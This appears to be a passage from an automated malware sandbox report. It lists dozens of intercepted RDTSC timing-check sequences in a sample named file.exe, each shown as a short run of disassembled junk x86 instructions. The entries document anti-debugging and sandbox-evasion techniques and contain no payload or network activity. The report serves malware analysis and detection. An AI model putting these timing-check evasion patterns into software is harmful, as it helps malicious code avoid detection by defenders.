                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110D59C second address: 110D5B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FBD38EF616Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110D834 second address: 110D83A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110D83A second address: 110D853 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD38EF616Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007FBD38EF6172h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110D853 second address: 110D85D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FBD3971C776h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110D9C3 second address: 110D9F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FBD38EF6166h 0x0000000a popad 0x0000000b jns 00007FBD38EF6168h 0x00000011 jnl 00007FBD38EF6176h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push ebx 0x0000001b js 00007FBD38EF6166h 0x00000021 pop ebx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110D9F7 second address: 110DA1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD3971C77Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FBD3971C782h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110DDF0 second address: 110DDF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110DDF5 second address: 110DE11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBD3971C788h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110E7EF second address: 110E7F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1111D68 second address: 1111D7A instructions: 0x00000000 rdtsc 0x00000002 jg 00007FBD3971C776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007FBD3971C776h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1111D7A second address: 1111D9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FBD38EF6176h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11122E5 second address: 11122EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1114E01 second address: 1114E1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD38EF6173h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1114E1A second address: 1114E24 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBD3971C782h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1114E24 second address: 1114E2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1114E2A second address: 1114E3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1114E3B second address: 1114E41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1114E41 second address: 1114E53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBD3971C77Dh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1114F89 second address: 1114F92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pop ecx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11153A5 second address: 11153A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11153A9 second address: 11153B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007FBD38EF6166h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11153B7 second address: 11153BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11153BF second address: 11153C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111BA78 second address: 111BA7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111BA7C second address: 111BA8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBD38EF616Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111BD2E second address: 111BD3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jno 00007FBD3971C776h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111BD3D second address: 111BD55 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FBD38EF6166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FBD38EF616Ah 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C54DD second address: 10C54E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111CB7B second address: 111CB7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1074491 second address: 1074497 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1074497 second address: 107449B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1124C44 second address: 1124C57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBD3971C77Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1124C57 second address: 1124C6B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD38EF6170h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1124F38 second address: 1124F40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1124F40 second address: 1124F64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD38EF616Fh 0x00000007 jmp 00007FBD38EF6171h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1124F64 second address: 1124F7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBD3971C784h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1124F7C second address: 1124F97 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FBD38EF6166h 0x00000008 jmp 00007FBD38EF616Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1125137 second address: 112513B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11253BF second address: 11253C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11253C4 second address: 11253F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBD3971C77Eh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b jmp 00007FBD3971C77Dh 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push ecx 0x00000013 jc 00007FBD3971C778h 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f push esi 0x00000020 pop esi 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1125539 second address: 112553D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112553D second address: 112554F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FBD3971C77Ch 0x0000000c jc 00007FBD3971C776h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11256F2 second address: 11256F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11256F6 second address: 112571A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBD3971C780h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f jmp 00007FBD3971C77Ah 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112571A second address: 1125720 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1125720 second address: 1125759 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBD3971C784h 0x00000008 jl 00007FBD3971C776h 0x0000000e popad 0x0000000f jmp 00007FBD3971C783h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 pushad 0x00000018 push esi 0x00000019 pop esi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1125759 second address: 112575F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112CC1C second address: 112CC3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FBD3971C776h 0x0000000a jnl 00007FBD3971C776h 0x00000010 popad 0x00000011 push ebx 0x00000012 jnl 00007FBD3971C776h 0x00000018 pushad 0x00000019 popad 0x0000001a pop ebx 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112CC3A second address: 112CC57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jno 00007FBD38EF6166h 0x0000000f jmp 00007FBD38EF616Dh 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112D093 second address: 112D09E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112E7BF second address: 112E7C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112E7C3 second address: 112E7E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD3971C786h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112E7E6 second address: 112E7EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112E7EC second address: 112E7F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112E7F0 second address: 112E815 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD38EF6179h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FBD38EF6168h 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112E815 second address: 112E81C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112E81C second address: 112E831 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FBD38EF6166h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d js 00007FBD38EF6172h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112E831 second address: 112E837 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11386B8 second address: 11386C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FBD38EF6166h 0x0000000a pop ecx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11386C3 second address: 11386E5 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBD3971C78Ah 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11386E5 second address: 11386EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11386EE second address: 11386F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113886B second address: 1138871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1139FD2 second address: 1139FF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop esi 0x00000008 pushad 0x00000009 ja 00007FBD3971C778h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007FBD3971C782h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114AD1A second address: 114AD1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114AD1E second address: 114AD46 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBD3971C776h 0x00000008 jmp 00007FBD3971C786h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jns 00007FBD3971C778h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114F813 second address: 114F84F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b ja 00007FBD38EF6166h 0x00000011 pop edi 0x00000012 push edx 0x00000013 jmp 00007FBD38EF6170h 0x00000018 pushad 0x00000019 popad 0x0000001a pop edx 0x0000001b popad 0x0000001c pushad 0x0000001d jmp 00007FBD38EF616Dh 0x00000022 pushad 0x00000023 pushad 0x00000024 popad 0x00000025 push edx 0x00000026 pop edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114F84F second address: 114F85D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FBD3971C776h 0x0000000a popad 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114F85D second address: 114F863 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114F863 second address: 114F86C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114F86C second address: 114F876 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FBD38EF6166h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1155974 second address: 115597A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115597A second address: 115597E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115597E second address: 1155992 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007FBD3971C778h 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1155992 second address: 1155996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1155996 second address: 11559A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115A9EE second address: 115A9F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115A9F3 second address: 115A9FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115A9FB second address: 115AA03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11614CF second address: 11614D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1161AC2 second address: 1161AE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBD38EF616Dh 0x00000009 popad 0x0000000a jnp 00007FBD38EF6172h 0x00000010 jnp 00007FBD38EF6166h 0x00000016 jg 00007FBD38EF6166h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1161EFB second address: 1161EFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1161EFF second address: 1161F03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1164F30 second address: 1164F5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBD3971C781h 0x00000009 pushad 0x0000000a popad 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e jmp 00007FBD3971C780h 0x00000013 pushad 0x00000014 push edx 0x00000015 pop edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11740DE second address: 11740E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11740E2 second address: 11740F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBD3971C77Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11740F7 second address: 11740FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11740FF second address: 1174105 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117592F second address: 1175949 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FBD38EF6166h 0x00000008 jmp 00007FBD38EF6170h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1175949 second address: 1175969 instructions: 0x00000000 rdtsc 0x00000002 je 00007FBD3971C782h 0x00000008 jmp 00007FBD3971C77Ah 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 js 00007FBD3971C790h 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1175969 second address: 117596D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117596D second address: 1175971 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1175971 second address: 117597A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1176E82 second address: 1176E8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FBD3971C776h 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1176E8F second address: 1176E96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1176E96 second address: 1176E9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1176E9C second address: 1176EA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1183CE4 second address: 1183CE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11936C0 second address: 11936C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1193DAA second address: 1193DAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1193DAF second address: 1193DB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
